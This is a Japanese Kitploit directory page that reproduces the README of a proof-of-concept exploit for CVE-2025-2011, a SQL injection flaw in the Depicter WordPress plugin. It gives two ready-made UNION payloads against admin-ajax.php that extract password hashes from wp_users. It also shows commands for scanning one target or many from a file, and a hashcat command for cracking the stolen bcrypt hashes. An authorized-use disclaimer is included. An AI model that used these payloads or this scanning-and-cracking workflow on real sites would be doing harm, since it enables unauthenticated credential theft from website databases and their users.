Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-2011 — CVE-2025-2011 用エクスプロイト | Kitploit
ツール/GitHubGitHub/x3rx3ssec/cve-2025-2011
パスワードクラッキング脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubx3rx3ssec/cve-2025-2011

CVE-2025-2011

CVE-2025-2011 用エクスプロイト

リポジトリを見る
18ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-2011 PoC

作者: X3RX3S しかし、Ash Wesker に堂々とパクられました。彼は自分のバナーを付けて私のコードを GPT で書き換えたのです ;) こちらをご覧ください ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 '彼の'コードには私のハンドル名さえ残っています -_-'

目的: WordPress サイトに対する SQL インジェクションの脆弱性(CVE-2025-2011)をテストするための概念実証(PoC)ツールです。
免責事項: 自分が所有するシステム、またはテストするための明示的な書面による許可を得たシステムに対してのみ使用してください。無許可のテストは違法であり、非倫理的です。 2025-11-02 19-44-16 のスクリーンショット


脆弱性について :)

  • WordPress 向けプラグイン「Slider & Popup Builder by Depicter」は、3.6.1 を含むそれ以前のすべてのバージョンにおいて、ユーザー指定パラメータのエスケープ処理が不十分で、既存の SQL クエリの準備(プリペアドステートメント)も不足しているため、's' パラメータを介した汎用 SQL インジェクションに対して脆弱です。これにより、認証されていない攻撃者が既存のクエリに追加の SQL クエリを連結し、データベースから機密情報を抽出するために使用できる可能性があります。

機能

  • 2 つの SQLi ペイロード(-p 1 または -p 2 で選択可能)
  • Bcrypt($2a$、$2b$、$2y$)ハッシュの検出($wp$ プレフィックス付きの亜種を含む)
  • ホスト名ごとに結果を保存: results_<hostname>.txt
  • bcrypt 用の Hashcat 連携(-m 3200)をプロンプト付きで任意に利用可能
  • 単一 URL(-u)またはファイル経由の複数ターゲット(-f)に対応

要件

  • Python 3.8+
  • pip パッケージ:
    • requests
    • colorama

依存関係のインストール:

root@kitploit:~
pip install requests colorama

任意(クラッキング用):

  • hashcat がインストールされ、PATH に含まれていること(デフォルトは /usr/share/wordlists/rockyou.txt)
  • /usr/share/wordlists/rockyou.txt などのワードリスト

使用方法

スクリプトを実行可能にする(任意):

root@kitploit:~
chmod +x CVE-2025-2011.py

単一ターゲット(デフォルトはペイロード 1):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com

単一ターゲット(ペイロード 2):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com -p 2

ファイルからの複数ターゲット(1 行に 1 URL):

root@kitploit:~
python3 CVE-2025-2011.py -f targets.txt

出力

テストした各ホストについて、スクリプトは結果ファイルを保存します:

root@kitploit:~
results_<hostname>.txt

bcrypt ハッシュが見つかった場合、それらは hashes.txt に保存され、Hashcat でクラックするかどうかを尋ねるプロンプトが表示されます。スクリプトが使用する Hashcat コマンドの例:

root@kitploit:~
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt

注: bcrypt は設計上遅いため、クラッキングには非常に長い時間がかかり、GPU が必要になる場合があります。


ペイロード

  • ペイロード 1(デフォルト):
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
  • ペイロード 2:
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x

法的・責任ある使用について

このツールは教育および防御目的でのみ提供されています。明示的な許可がないシステムに対して使用しないでください。作者および配布者は、不正使用について一切の責任を負いません。所有していないターゲットに対してテストを実行する前に、必ず書面による許可を取得してください。


注意事項とチューニング

  • 別のワードリストを使用する場合は、スクリプト内の run_hashcat 関数を更新して、お好みのリストを参照するようにしてください。
  • Hashcat がインストールされていない場合、またはハッシュをクラックしたくない場合は、プロンプトが表示されたら N と答えてください。
  • 大規模なスキャンの場合は、スクリプト内でタイムアウトとスレッドの動作を調整できます。

寄せ集め by

  • X3RX3S
  • 責任あるセキュリティ研究のワークフローと Chocapikk (https://github.com/Chocapikk.) に触発されました。
ツールをダウンロード